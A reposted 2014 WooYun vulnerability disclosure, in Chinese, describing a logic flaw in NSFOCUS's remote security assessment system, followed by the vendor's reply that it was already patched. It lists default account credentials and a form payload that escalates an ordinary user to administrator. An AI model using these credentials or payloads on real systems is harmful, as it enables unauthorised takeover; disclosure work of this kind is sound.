[公开漏洞]绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一

来源:WooYun 浏览:654次 时间:2014-06-27
做网站找雨过天晴工作室
绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一 相关厂商: 绿盟科技 漏洞作者:路人甲 提交时间:2014-06-26 08:24 公开时间:2014-06-26 13:50 漏洞类型:设计缺陷/逻辑错误 危害等级:高 自评Rank:20 漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞 漏洞来源:http://www.wooyun.org Tags标签: 逻辑错误 漏洞详情 披露状态:

2014-06-26:细节已通知厂商并且等待厂商处理中
2014-06-26:厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞如下.

详细说明:

默认2个帐号:reporter,auditor密码是nsfocus。



用普通帐号登陆,修改密码处,

.png



user%5Baccount%5D=admin&user%5Bname%5D=Admin&user%5Bpassword%5D=admin123&user%5Bpassword.confirm%5D=admin123&user%5Bmail%5D=admin%40example.com&user%5Broles%5D=ADMINISTRATORS&user%5BallowLoginIp%5D=*.*.*.*&user%5BallowScanIp%5D=*.*.*.*&user%5BmaxTask%5D=150



1 处修改ADMINISTRATORS



2 处修改 帐号 admin 就可以了。



最后即可admin登陆。

漏洞证明:

如上

修复方案:

程序开发人员修改下。加上码。

版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-26 13:50

厂商回复:

谢谢告知。由于没有告知具体设备版本号,经过研发人员排查,此漏洞为已知漏洞,影响RSAS 5.0.8.13及以前版本,已在RSAS v 5.0.9.0版本中修复,2011-09-22升级包发布。

目前RSAS V5最新版本5.0.13以及RSAS V6均不受此漏洞影响。

如能告知发现此问题的设备的具体版本号,我们可做进一步的排查确认,非常感谢。

最新状态:

暂无